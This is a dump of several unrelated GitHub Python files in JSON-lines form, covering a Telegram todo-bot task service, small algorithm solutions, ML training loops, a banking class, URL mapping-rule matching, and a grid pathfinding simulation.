_\nfrom dateutil.relativedelta import relativedelta\nfrom peewee import DoesNotExist\n\n\ndef get_tasks(user_id: int) -> List[Task]:\n return Task.select().where(Task.author == user_id)\n\n\ndef get_to_do(user_id: int) -> List[Task]:\n tasks = get_tasks(user_id)\n return [task for task in tasks if not task.is_done]\n\n\ndef get_completed(user_id: int) -> List[Task]:\n tasks = get_tasks(user_id)\n return [task for task in tasks if task.is_done]\n\n\ndef create_task(user_id: int, task_name: str, task_date: datetime, task_time: datetime, periodicity: str, attachments: str):\n user = User.get(User.id == user_id)\n new_task = Task.create(author=user, text=task_name, date=task_date, time=task_time, periodicity=periodicity, attachments=attachments)\n new_task.save()\n return new_task.id\n\n\ndef get_task_by_id(id: int) -> Optional[Task]:\n task = Task.get_or_none(Task.id == id)\n if task is None:\n logger.exception(f'No task found with id {id}')\n # raise ValueError(_(f\"No task found with id {id}\"))\n \n return task\n\n\ndef get_task_by_date(time: str) -> List[Task]:\n return Task.select().where((Task.time == time) & (Task.is_done == False))\n\n\ndef change_is_done(id: int) -> None:\n task = get_task_by_id(id)\n is_done = task.is_done\n if task.periodicity == 'no':\n task.is_done = not is_done\n else:\n try:\n # parse the number of days from the periodicity string\n days = int(task.periodicity.split()[0])\n\n # add the remaining days to the end of the month\n remaining_days = calendar.monthrange(task.date.year, task.date.month)[1] - task.date.day\n if remaining_days < days:\n task.date += timedelta(days=remaining_days)\n days -= remaining_days\n else:\n task.date += timedelta(days=days)\n days = 0\n\n # add the remaining days to the end of each month\n while days > 0:\n # calculate the number of days in the next month\n next_month = task.date.replace(day=1) + relativedelta(months=1)\n days_in_month = (next_month - timedelta(days=1)).day\n\n # add the remaining days to the end of the month\n if days_in_month <= days:\n task.date = next_month\n days -= days_in_month\n else:\n task.date = next_month.replace(day=days)\n days = 0\n except ValueError as e:\n logger.exception(f\"Invalid periodicity format: {task.periodicity}\")\n return\n task.done_date = datetime.now() if task.is_done else None\n task.save()\n\n\ndef add_days_to_date(date: datetime, days: int) -> datetime:\n days_in_month = (date.replace(day=1) + timedelta(days=32)).day - 1\n days_left = days_in_month - date.day + 1\n if days <= days_left:\n return date + timedelta(days=days)\n else:\n next_month = date.replace(day=1) + timedelta(days=32)\n days_to_add = days - days_left\n return next_month.replace(day=1) + timedelta(days=days_to_add - 1)\n\n\ndef delete_by_id(id: int) -> None:\n task = get_task_by_id(id)\n task.delete_instance()\n\n\nasync def update_task(id: int, text: Optional[str] = None, date: Optional[datetime] = None,\n time: Optional[datetime] = None, periodicity: Optional[str] = None) -> bool:\n task = get_task_by_id(id)\n if task is None:\n return False\n if text is not None:\n task.text = text\n if date is not None:\n task.date = date.date()\n if time is not None:\n task.time = time.time()\n if periodicity is not None:\n task.periodicity = periodicity\n task.save()\n return True\n\n\ndef delete_all_tasks(user_id: int, param: str) -> None:\n tasks = Task.select().where(Task.author == user_id)\n if param == 'to-do':\n tasks_del = tasks.where(Task.is_done == False)\n elif param == 'completed':\n tasks_del = tasks.where(Task.is_done == True)\n else:\n logger.exception(f'Invalid parameter.')\n return\n deleted_count = 0\n for task in tasks_del:\n task.delete_instance()\n deleted_count += 1\n if deleted_count == 0:\n logger.exception(f'No tasks to delete.')\n else:\n logger.exception(f'{deleted_count} tasks have been deleted.')\n\n\ndef add_attachment_by_id(task_id: int, attachment: str):\n task = Task.get_or_none(Task.id == task_id)\n if task is None:\n logger.exception(f\"No Task found with id {task_id}\")\n \n new_attachments = task.attachments + \";\" + attachment\n task.attachments = new_attachments\n task.save()\n\n\ndef delete_attachments_by_id(task_id: int, indices: List[int]) -> int:\n try:\n task = Task.get_by_id(task_id)\n except DoesNotExist:\n return -1\n \n attachments = task.attachments.split(';')\n attachments.pop(-1)\n \n for index in indices:\n if index < 0 or index >= len(attachments):\n return -1\n \n new_attachments = [att for idx, att in enumerate(attachments) if idx not in indices]\n new_attachments_str = ';'.join(new_attachments) + ';'\n \n task.attachments = new_attachments_str\n task.save()\n \n return 0","repo_name":"IMZolin/Todolist-Telegram-bot","sub_path":"services/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23217811026","text":"from itertools import permutations\nfrom math import floor, sqrt\nimport sys\n\n\nread = sys.stdin.readline\n\nyumi = tuple(map(int, read().split()))\npeople = [tuple(map(int, read().split())) for _ in range(3)]\n\nmin_distance = 1e9\nfor p in permutations(people):\n distance = sqrt((yumi[0]-p[0][0])**2\n + (yumi[1]-p[0][1])**2)\n for i in range(2):\n distance += sqrt((p[i][0]-p[i+1][0])**2\n + (p[i][1]-p[i+1][1])**2)\n \n min_distance = min(min_distance, distance)\n \nprint(floor(min_distance))\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob17286.py","file_name":"prob17286.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2418513031","text":"from unittest import TestCase\nfrom leetcode.WordsReverse import *\n\n__author__ = 'mywo'\n\n\nclass TestSolution(TestCase):\n def test_reverseWords(self):\n solution = Solution()\n self.assertEqual(\"blue is sky the\", solution.reverseWords(\"the sky is blue\"))\n","repo_name":"alex-1q84/leetcode","sub_path":"python/test/test_WordsReverse.py","file_name":"test_WordsReverse.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71458428967","text":"from inheritemp import Employee\r\nclass Programmer(Employee):\r\n def __init__(self,eid=0,ename=None,basic=0,extrahrs=0,perhr=0):\r\n super().__init__(eid,ename,basic)\r\n self.extrahrs=extrahrs\r\n self.perhr=perhr\r\n def display(self):\r\n print(\"-----------PROGRAMMER-----------------------------------\")\r\n super().display() \r\n print(\"PROGRAMMER PER HOURS :\",self.perhr)\r\n print(\"PROGRAMMER EXTRA HOURS :\",self.extrahrs)\r\n print(\"-----------PROGRAMMER END--------------------------------\")\r\n#p1=Programmer(102,\"RAHUL\",34689,5,3456)\r\n#p1.display() \r\n\r\n\r\n","repo_name":"affankhan21/python","sub_path":"inheritprogrammer.py","file_name":"inheritprogrammer.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7493816767","text":"import torch\nfrom gem.models.base import Trainer\nfrom itertools import chain\nfrom tabulate import tabulate\n\nfrom gem.utils import nats2bits\n\nclass VAETrainer(Trainer):\n def __init__(self, sensor, train_loader, val_loader=None, test_loader=None, config={}):\n super().__init__(train_loader, val_loader=val_loader, test_loader=test_loader, config=config)\n\n self.sensor = sensor\n self.sensor = self.sensor.to(self.device)\n\n # config optimizer\n self.optim = torch.optim.Adam(self.sensor.parameters(), lr=self.config['m_lr'], \n betas=(self.config['m_beta1'], self.config['m_beta2']))\n\n def parse_batch(self, batch):\n batch = batch[0].to(self.device)\n if len(batch.shape) == 5:\n batch = batch.view(-1, *batch.shape[2:]) \n return batch \n\n def train_step(self):\n batch = self.parse_batch(next(self.train_iter))\n\n loss, info = self.sensor(batch)\n\n self.optim.zero_grad()\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(self.sensor.parameters(), self.config['m_grad_clip'])\n self.optim.step()\n info.update({\"sensor_grad_norm\" : grad_norm})\n\n self.last_train_info = info\n\n def log_step(self, step):\n val_loss, val_info = self.test_whole(self.val_loader)\n\n print('In Step {}'.format(step))\n print('-' * 15)\n print('In training set:')\n print(tabulate(self.last_train_info.items(), numalign=\"right\"))\n print('In validation set:')\n print(tabulate(val_info.items(), numalign=\"right\"))\n\n for k in val_info.keys():\n self.writer.add_scalars('sensor/' + k, {'train' : self.last_train_info[k], \n 'val' : val_info[k]}, global_step=step)\n self.writer.add_scalar('sensor/grad_norm', self.last_train_info['sensor_grad_norm'], global_step=step)\n \n with torch.no_grad():\n imgs = torch.clamp(self.sensor.sample(64) + 0.5, 0, 1)\n self.writer.add_images('samples', imgs, global_step=step)\n batch = self.parse_batch(next(self.train_iter))\n input_imgs = batch[:32]\n reconstructions = torch.clamp(self.sensor.decode(self.sensor.encode(input_imgs)) + 0.5, 0, 1)\n inputs_and_reconstructions = torch.stack([input_imgs + 0.5, reconstructions], dim=1).view(input_imgs.shape[0] * 2, *input_imgs.shape[1:])\n self.writer.add_images('inputs_and_reconstructions', inputs_and_reconstructions, global_step=step)\n \n def test_whole(self, loader):\n with torch.no_grad():\n num = 0\n info = {}\n loss = 0\n for batch in iter(loader):\n num += 1\n batch = self.parse_batch(batch)\n _loss, _info = self.sensor(batch)\n loss += _loss\n for k in _info.keys():\n info[k] = info.get(k, 0) + _info[k]\n loss = loss / num\n for k in info.keys():\n info[k] = info[k] / num\n\n return loss.item(), info\n\n def save(self, filename):\n test_loss, test_info = self.test_whole(self.test_loader)\n torch.save({\n \"sensor_state_dict\" : self.sensor.state_dict(),\n \"optimizer_state_dict\" : self.optim.state_dict(),\n \"test_info\" : test_info,\n \"config\" : self.config,\n \"sensor_parameters\" : self.config['sensor_param'],\n \"seed\" : self.config['seed'],\n }, filename)\n\n def restore(self, checkpoint):\n self.sensor.load_state_dict(checkpoint['sensor_state_dict'])\n self.sensor = self.sensor.to(self.device) # make sure model on right device\n self.optim.load_state_dict(checkpoint['optimizer_state_dict'])\n\nclass AVAETrainer(Trainer): # NOTE: this is broken now!\n def __init__(self, model, train_loader, val_loader=None, test_loader=None, config={}):\n super().__init__(model, train_loader, val_loader=val_loader, test_loader=test_loader, config=config)\n\n # config optimizor\n self.discriminator_optim = torch.optim.Adam(model.discriminator.parameters(), \n lr=config['lr'], betas=(config['beta1'], config['beta2']))\n self.coder_optim = torch.optim.Adam(chain(model.encoder.parameters(), model.decoder.parameters()), \n lr=config['lr'], betas=(config['beta1'], config['beta2']))\n\n def parse_batch(self, batch):\n batch = batch[0].to(self.device)\n if len(batch.shape) == 5:\n batch = batch.view(-1, *batch.shape[2:]) \n return batch \n\n def train_step(self):\n for i in range(self.config['n_critic']):\n real = self.parse_batch(next(self.train_iter))\n\n loss, mask, info = self.model(real)\n discriminator_loss = -loss\n\n self.discriminator_optim.zero_grad()\n discriminator_loss.backward()\n self.discriminator_optim.step()\n\n # train generator only once\n real = self.parse_batch(next(self.train_iter))\n generator_loss, mask, info = self.model(real)\n\n self.coder_optim.zero_grad()\n generator_loss.backward()\n self.coder_optim.step()\n\n self.last_discriminator_loss = discriminator_loss.item()\n self.last_train_loss = generator_loss.item()\n self.last_train_info = info\n self.last_mask = mask.detach()\n\n def log_step(self, step):\n val_loss, val_info = self.test_whole(self.val_loader)\n print('In Step {}'.format(step))\n print('-' * 15)\n print('In training set:')\n print('NELBO is {0:{1}} bits'.format(nats2bits(self.last_train_loss), '.2f'))\n print('D loss is {0:{1}} bits'.format(nats2bits(self.last_discriminator_loss), '.2f'))\n for k in self.last_train_info.keys():\n print('{0} is {1:{2}} bits'.format(k, nats2bits(self.last_train_info[k]), '.2f'))\n print('In validation set:')\n print('NELBO is {0:{1}} bits'.format(nats2bits(val_loss), '.2f'))\n for k in val_info.keys():\n print('{0} is {1:{2}} bits'.format(k, nats2bits(val_info[k]), '.2f'))\n\n self.writer.add_scalars('NELBO', {'train' : nats2bits(self.last_train_loss), \n 'val' : nats2bits(val_loss)}, global_step=step)\n for k in self.last_train_info.keys():\n self.writer.add_scalars(k, {'train' : nats2bits(self.last_train_info[k]), \n 'val' : nats2bits(val_info[k])}, global_step=step)\n \n with torch.no_grad():\n imgs = torch.clamp(self.model.sample(64), 0, 1)\n self.writer.add_images('samples', imgs, global_step=step)\n batch = self.parse_batch(next(self.train_iter))\n input_imgs = batch[:32]\n reconstructions = torch.clamp(self.model.decode(self.model.encode(input_imgs)), 0, 1)\n inputs_and_reconstructions = torch.stack([input_imgs, reconstructions], dim=1).view(input_imgs.shape[0] * 2, *input_imgs.shape[1:])\n self.writer.add_images('inputs_and_reconstructions', inputs_and_reconstructions, global_step=step)\n mask_max = torch.max(torch.max(self.last_mask, dim=2, keepdim=True)[0], dim=3, keepdim=True)[0]\n self.writer.add_images('mask', self.last_mask / mask_max, global_step=step)\n\n def test_whole(self, loader):\n with torch.no_grad():\n num = 0\n info = {}\n loss = 0\n for batch in iter(loader):\n num += 1\n batch = self.parse_batch(next(self.train_iter))\n _loss, _mask, _info = self.model(batch)\n loss += _loss\n for k in _info.keys():\n info[k] = info.get(k, 0) + _info[k]\n loss = loss / num\n for k in info.keys():\n info[k] = info[k] / num\n\n return loss.item(), info\n\n def save(self, filename):\n torch.save({\n \"model_state_dict\" : self.model.state_dict(),\n \"discriminator_optimizer_state_dict\" : self.discriminator_optim.state_dict(),\n \"coder_optimizer_state_dict\" : self.coder_optim.state_dict(),\n \"config\" : self.config,\n \"model_parameters\" : self.config['model_param'],\n \"seed\" : self.config['seed'],\n }, filename)\n\n def restore(self, filename):\n checkpoint = torch.load(filename, map_location='cpu')\n self.model.load_state_dict(checkpoint['model_state_dict'])\n self.model = self.model.to(self.device) # make sure model on right device\n self.discriminator_optim.load_state_dict(checkpoint['discriminator_optimizer_state_dict'])\n self.coder_optim.load_state_dict(checkpoint['coder_optimizer_state_dict'])\n\n","repo_name":"IcarusWizard/GEM","sub_path":"gem/models/sensor/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7047917057","text":"import time\n\nclass BankAccount(object):\n def __init__(self, label, balance):\n self.label = label\n self.balance = balance\n\n def __str__(self):\n print(\"Label: {label}\\nBalance:{bal}\".format(\n label = self.label, bal = self.balance))\n return \"Label: {label}\\nBalance:{bal}\".format(\n label = self.label, bal = self.balance)\n def withdraw(self, amount):\n if(amount > self.balance):\n print(\"Sorry, you require $\" + str(amount-self.balance) + \" inorder to withdraw\")\n return\n elif(amount < 0):\n print(\"Sorry, that is an invalid amount.\")\n else:\n self.balance -= amount\n print(\"Transaction Sucessfull! You have ${bal} remaing in you account.\".format(bal = self.balance))\n return\n\n def deposit(self, amount):\n if(amount < 0):\n print(\"Sorry, that is an invalid amount.\")\n return\n else:\n self.balance += amount\n print(\"Transaction Successfull! You have ${bal} remaingin you account.\".format(bal = self.balance))\n\n def rename(self, new_label):\n if(new_label == \"\"):\n print(\"Please provide a valid label.\")\n return\n self.label = new_label\n print(\"Label Sucessfully changed!\")\n return\n\n def transfer(self, dest_account, amount):\n if(amount < 0 or amount > self.balance):\n print(\"Sorry, invalid transfer.\")\n return\n self.balance -= amount\n dest_account.deposit(amount)\n print(\"Transfer Sucessfull!\")\n return\n\nclass Transaction(self):\n def __init__(self, time, type, amount, dest_account=None):\n self.time = time\n self.type = type\n self.amount = amount\n self.dest_account = dest_account\n","repo_name":"TrippleCCC/DANK_CSSI_STUFFS","sub_path":"python/labs/quick-banking-app/starter-code/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39010394729","text":"from pydantic import AnyHttpUrl\nfrom starlette.datastructures import QueryParams\n\nfrom horizon.enforcer.schemas import MappingRuleData\n\n\nclass MappingRulesUtils:\n @staticmethod\n def _compare_urls(mapping_rule_url: AnyHttpUrl, request_url: AnyHttpUrl) -> bool:\n if mapping_rule_url.scheme != request_url.scheme:\n return False\n if mapping_rule_url.host != request_url.host:\n return False\n if not MappingRulesUtils._compare_url_path(\n mapping_rule_url.path, request_url.path\n ):\n return False\n if not MappingRulesUtils._compare_query_params(\n mapping_rule_url.query, request_url.query\n ):\n return False\n return True\n\n @staticmethod\n def _compare_url_path(\n mapping_rule_url: str | None, request_url: str | None\n ) -> bool:\n if mapping_rule_url is None and request_url is None:\n return True\n if not (mapping_rule_url is not None and request_url is not None):\n return False\n mapping_rule_url_parts = mapping_rule_url.split(\"/\")\n request_url_parts = request_url.split(\"/\")\n if len(mapping_rule_url_parts) != len(request_url_parts):\n return False\n for i in range(len(mapping_rule_url_parts)):\n if mapping_rule_url_parts[i].startswith(\"{\") and mapping_rule_url_parts[\n i\n ].endswith(\"}\"):\n continue\n if mapping_rule_url_parts[i] != request_url_parts[i]:\n return False\n return True\n\n @staticmethod\n def _compare_query_params(\n mapping_rule_query_string: str | None, request_url_query_string: str | None\n ) -> bool:\n if mapping_rule_query_string is None and request_url_query_string is None:\n # if both are None, they are equal\n return True\n if mapping_rule_query_string is not None and request_url_query_string is None:\n # if the request query string is None, but the mapping rule query string is not\n # then the request does not match the mapping rule\n return False\n if mapping_rule_query_string is None and request_url_query_string is not None:\n # if the mapping rule query string is None, but the request query string is not\n # then the request matches the query string rules it has additional data to the rule\n return True\n\n mapping_rule_query_params = QueryParams(mapping_rule_query_string)\n request_query_params = QueryParams(request_url_query_string)\n\n for key in mapping_rule_query_params.keys():\n if key not in request_query_params:\n return False\n\n if mapping_rule_query_params[key].startswith(\n \"{\"\n ) and mapping_rule_query_params[key].endswith(\"}\"):\n # if the value is an attribute\n # we just need to make sure the attribute is in the request query params\n continue\n elif mapping_rule_query_params[key] != request_query_params[key]:\n # if the value is not an attribute, verify that the values are the same\n return False\n return True\n\n @staticmethod\n def extract_attributes_from_url(rule_url: str, request_url: str) -> dict:\n rule_url_parts = rule_url.split(\"/\")\n request_url_parts = request_url.split(\"/\")\n attributes = {}\n if len(rule_url_parts) != len(request_url_parts):\n return {}\n for i in range(len(rule_url_parts)):\n if rule_url_parts[i].startswith(\"{\") and rule_url_parts[i].endswith(\"}\"):\n attributes[rule_url_parts[i][1:-1]] = request_url_parts[i]\n return attributes\n\n @staticmethod\n def extract_attributes_from_query_params(rule_url: str, request_url: str) -> dict:\n if \"?\" not in rule_url or \"?\" not in request_url:\n return {}\n rule_query_params = QueryParams(rule_url.split(\"?\")[1])\n request_query_params = QueryParams(request_url.split(\"?\")[1])\n attributes = {}\n for key in rule_query_params.keys():\n if rule_query_params[key].startswith(\"{\") and rule_query_params[\n key\n ].endswith(\"}\"):\n attributes[rule_query_params[key][1:-1]] = request_query_params[key]\n return attributes\n\n @classmethod\n def extract_mapping_rule_by_request(\n cls,\n mapping_rules: list[MappingRuleData],\n http_method: str,\n url: AnyHttpUrl,\n ) -> MappingRuleData | None:\n matched_mapping_rules = []\n for mapping_rule in mapping_rules:\n if not mapping_rule.http_method == http_method.lower():\n # if the method is not the same, we don't need to check the url\n continue\n if not cls._compare_urls(mapping_rule.url, url):\n # if the urls doesn't match, we don't need to check the headers\n continue\n matched_mapping_rules.append(mapping_rule)\n # most priority first\n matched_mapping_rules.sort(key=lambda rule: rule.priority or 0, reverse=True)\n if len(matched_mapping_rules) > 0:\n return matched_mapping_rules[0]\n\n return None\n","repo_name":"permitio/sidecar","sub_path":"horizon/enforcer/utils/mapping_rules_utils.py","file_name":"mapping_rules_utils.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27825659977","text":"import math\nimport multiprocessing\nimport random\nimport warnings\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Tuple, Any\n\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom sty import fg\nfrom common import get_config, format_time_difference, load_file, clean_dataset, create_classifiers\n\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n\ndef calculate_auc(df: pd.DataFrame, classifier, k_fold: KFold, original_class: pd.DataFrame) -> Tuple[Any, float]:\n aucs = []\n for train_index, test_index in k_fold.split(df, original_class):\n training_set, test_set = df.iloc[train_index], df.iloc[test_index]\n training_class, test_class = original_class.iloc[train_index], original_class.iloc[test_index]\n if hasattr(classifier, \"predict_proba\"):\n predicted = classifier.fit(training_set, training_class).predict_proba(test_set)[:, 1]\n else:\n prob_pos = classifier.fit(training_set, training_class).decision_function(test_set)\n predicted = \\\n (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())\n fpr, tpr, _ = metrics.roc_curve(test_class, predicted)\n auc = metrics.auc(fpr, tpr)\n aucs.append(auc)\n return classifier, sum(aucs) / k_fold.n_splits\n\n\ndef get_best_classifier(df: pd.DataFrame, classifiers: List, seed: int, pool: multiprocessing.Pool) -> Tuple[Any, float]:\n kf = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\n original_class = df['class']\n df = df.drop(columns='class')\n results = pool.starmap(calculate_auc, [(df, classifier, kf, original_class) for classifier in classifiers])\n results.sort(key=lambda x: x[1], reverse=True)\n\n return results[0]\n\n\ndef obtain_best_classifier_in_folder(directory: Path, seed: int) -> List[Tuple[Any, float, Path]]:\n procs = get_config(\"INIT\", \"procs\")\n if procs.isspace() or not procs.isnumeric():\n procs = math.floor(multiprocessing.cpu_count() / 2)\n else:\n procs = int(procs)\n\n pool = multiprocessing.Pool(procs)\n files = [x for x in directory.iterdir() if x.suffix == \".csv\"]\n classifiers = create_classifiers()\n result = []\n for file in files:\n df = load_file(file)\n df = clean_dataset(df)\n start = datetime.now()\n classifier, auc = get_best_classifier(df, classifiers, seed, pool)\n end = datetime.now()\n result.append((classifier, auc, file))\n print(\n f\"Finished file {fg.blue}{file}{fg.rs}, took {format_time_difference(start.timestamp(), end.timestamp())}\")\n pool.close()\n return result\n\n\ndef multiple_analysis(num_of_seeds):\n directory = Path(\"Data/Partitions\").resolve()\n seeds = [random.randint(1, 10000000) for _ in range(num_of_seeds)]\n total_results = pd.DataFrame()\n for seed in seeds:\n results = obtain_best_classifier_in_folder(directory, seed)\n idx = [x[2].stem for x in results]\n data = [x[1] for x in results]\n series = pd.Series(name=f\"{seed}\", data=data, index=idx)\n total_results = total_results.append(series)\n print(total_results)\n total_results.to_csv(\"Data/vic_results.csv\")\n print(total_results.mean())\n print(total_results.mean().sort_values())\n\n\ndef main():\n args = ArgumentParser()\n args.add_argument(\"-d\", \"--directory\", required=True, help=\"File to be analyzed\")\n args.add_argument(\"-s\", \"--seed\", required=False, help=\"Seed which wants to be used, must be numeric\", type=int)\n args.parse_args()\n\n directory = Path(args.directory).resolve()\n if not args.seed:\n seed = get_config(\"INIT\", \"seed\")\n if seed.isspace() or not seed.isnumeric():\n seed = 1\n else:\n seed = int(seed)\n else:\n seed = args.seed\n\n start = datetime.now()\n results = obtain_best_classifier_in_folder(directory, seed)\n end = datetime.now()\n print(f\"Analysis of all files took {format_time_difference(start.timestamp(), end.timestamp())}\")\n for classifier, auc, file in results:\n print(f\"File {file.name} best classifier is {type(classifier).__name__} with auc {auc}\")\n\n rs = len(results)\n results = [x for x in results if not math.isnan(x[1])]\n print(f\"Removed {rs - len(results)} that have nan\")\n\n results.sort(key=lambda x: x[1], reverse=True)\n\n print(f\"{fg.blue}The best 5 splits are:{fg.rs}\")\n for _, auc, file in results[:5]:\n print(f\"- {fg.green}{file}{fg.rs} with auc {fg.green}{auc}{fg.rs}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edjacob25/Vic","sub_path":"vic.py","file_name":"vic.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17454924428","text":"# 백준- https://www.acmicpc.net/problem/5636\nimport math\nimport sys\n# 소수 판별 함수\ndef is_prime_number(x):\n # 2부터 x의 제곱근까지의 모든 수를 확인하며\n for i in range(2, int(math.sqrt(x)) + 1):\n # x가 해당 수로 나누어떨어진다면\n if x % i == 0:\n return False # 소수가 아님\n return True # 소수임\n\nfor line in sys.stdin:\n line = line.rstrip()\n max_prime_number = 0\n if line == \"0\":\n break\n for i in range(1,len(line)+1):\n start = 0\n while (start+i<len(line)+1):\n num = int(line[start:start+i])\n if is_prime_number(num) and max_prime_number<num and 2<= num <100000:\n max_prime_number = num\n start+=1\n print(max_prime_number)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열(nomal)문제모음/소수_부분_문자열.py","file_name":"소수_부분_문자열.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24738408777","text":"from collections import namedtuple\nimport numpy as np\nnp.set_printoptions(precision=2)\nimport sys\n\nfrom time import time\n\nfrom functools import partial\n\nimport pygame\nfrom Agent import A_star_agent, D_star_agent, MapStatus, scan_8_grid, scan_circular\nfrom Grid import Grid, GridStatus\n\nOffset = namedtuple(\"Offset\", [\"top\", \"bottom\", \"left\", \"right\"])\n\nclass Simulation(object):\n def __init__(self, render=False, window_size=None, FPS=None, render_offset=(0,0,0,0), center_col_width=0) -> None:\n self.agent = None\n self.grid = None\n self.render = render\n self.window_size = window_size\n self.FPS = FPS\n self.render_offset = render_offset # (top,bottom,left,right)\n self.center_col_width = center_col_width\n\n if render and (window_size is None or FPS is None):\n print(\"Render set to True, but no render parameters given.\")\n sys.exit()\n if render:\n import pygame\n pygame.init()\n self.clock = pygame.time.Clock()\n self.screen = pygame.display.set_mode(window_size)\n self.color_dict = {\"black\": (0,0,0), \n \"red\": (255,0,0), \n \"white\": (255,255,255), \n \"gray\": (128,128,128),\n \"blue\": (0,0,255),\n \"purple\": (128,0,128),\n \"green\": (0,255,0),\n \"yellow\": (255,255,0),\n \"brown\": (205,133,63),\n \"turquoise\": (100,200,255),\n }\n\n def init_grid(self, grid_size) -> None:\n self.grid = Grid(grid_size)\n\n def fill_random_grid(self, agent_pos=None, target_pos=None, probability=0.3, seed=None) -> None:\n np.random.seed(seed)\n self.grid.fill_random_grid(probability)\n if agent_pos is None:\n self.grid.set_random_agent()\n else:\n self.grid.place_agent(agent_pos, force=True)\n if target_pos is None:\n self.grid.set_random_target()\n else:\n self.grid.place_target(target_pos, force=True)\n\n def init_agent(self, agent_class, vision_func) -> None:\n if self.grid is None:\n print(\"No grid, can't initialize agent.\")\n sys.exit()\n self.agent = agent_class(vision_func=vision_func)\n self.agent.set_target(self.grid.relative_target_pos())\n\n def reset(self) -> None:\n self.grid = None\n self.agent = None\n\n def run_sim(self, manual=False) -> None:\n if self.render:\n self.render_frame()\n if manual:\n started = False\n while not started:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN: \n started = True\n\n # do an initial scan\n self.agent.update_map(self.grid.scan_cone(self.agent.cone_of_vision()))\n\n finished = self.grid.agent_reached_target()\n # search loop\n while not finished: \n # check for possible mismatches between agent map and grid\n if self.agent.reached_target() != self.grid.agent_reached_target():\n print(\"Mismatch between agent knowledge and grid status.\")\n break\n # check if agent path is still valid\n if not self.agent.path_valid():\n # try to plan a path\n if not self.agent.plan():\n print(\"Planning failed.\")\n break\n # try to take next step in path\n if not self.grid.agent_move(self.agent.next_action()):\n print(\"Environment does not allow the next action.\")\n break\n # if environment allows this action\n if not self.agent.take_next_action():\n print(\"Agent knowledge does not allow the next action.\")\n break\n # agent scan and update\n self.agent.update_map(self.grid.scan_cone(self.agent.cone_of_vision()))\n # check for reaching target\n finished = self.grid.agent_reached_target()\n\n # render\n if self.render:\n self.render_frame()\n if manual:\n started = False\n while not started:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN: \n started = True\n\n if not finished:\n print(\"Sim loop exited without agent reaching target.\")\n\n def draw_grid(self, grid_rect) -> None:\n grid_size = self.grid.size()\n\n # compute grid cell sizing\n # in pygame, first coordinate is horizontal\n horizontal_width = grid_rect.width // grid_size[1]\n vertical_width = grid_rect.height // grid_size[0]\n\n cell_width = min(horizontal_width, vertical_width)\n\n curr_corner = np.array([grid_rect.left, grid_rect.top])\n\n cells = [] # used to store all the drawn rectangles\n\n for i in range(grid_size[0]):\n cells.append([])\n for j in range(grid_size[1]):\n # set cell fill color base on cell status\n cell_status = self.grid.get_cell((i,j))\n if cell_status == GridStatus.AGENT:\n c = self.color_dict[\"blue\"]\n elif cell_status == GridStatus.PREV_AGENT:\n c = self.color_dict[\"turquoise\"]\n elif cell_status == GridStatus.TARGET:\n c = self.color_dict[\"green\"]\n elif cell_status == GridStatus.BOTH:\n c = self.color_dict[\"yellow\"]\n elif cell_status == GridStatus.OBSTACLE:\n c = self.color_dict[\"brown\"]\n else:\n c = self.color_dict[\"black\"]\n # set location\n rect = pygame.Rect(curr_corner[0], curr_corner[1], cell_width, cell_width)\n cells[-1].append(rect)\n # draw the cell\n pygame.draw.rect(self.screen, c, rect)\n # draw cell border\n pygame.draw.rect(self.screen, self.color_dict[\"gray\"], rect, 1)\n curr_corner += np.array([cell_width,0])\n curr_corner[0] = grid_rect.left\n curr_corner += np.array([0,cell_width])\n\n # draw the scan border\n corner = np.array([grid_rect.left, grid_rect.top])\n corner += np.array([self.grid.agent_pos[1]-1, self.grid.agent_pos[0]-1]) * cell_width\n scan_width = 3 * cell_width\n pygame.draw.rect(self.screen, self.color_dict[\"red\"], pygame.Rect(corner[0], corner[1], scan_width, scan_width), 2)\n\n # draw the agent's planned path\n path = self.agent.get_path_agent_frame()\n if path.shape[0] != 0:\n path = self.grid.translate_path_to_world_frame(path)\n for k in range(path.shape[0]-1):\n curr_coord = path[k]\n next_coord = path[k+1]\n if self.grid.in_bounds(curr_coord) and self.grid.in_bounds(next_coord):\n pygame.draw.line(self.screen, self.color_dict[\"purple\"], \n cells[curr_coord[0]][curr_coord[1]].center, cells[next_coord[0]][next_coord[1]].center, 3)\n else:\n break\n\n def draw_map(self, map_rect) -> None:\n map_size = self.agent.map_size()\n\n # compute grid cell sizing\n # in pygame, first coordinate is horizontal\n 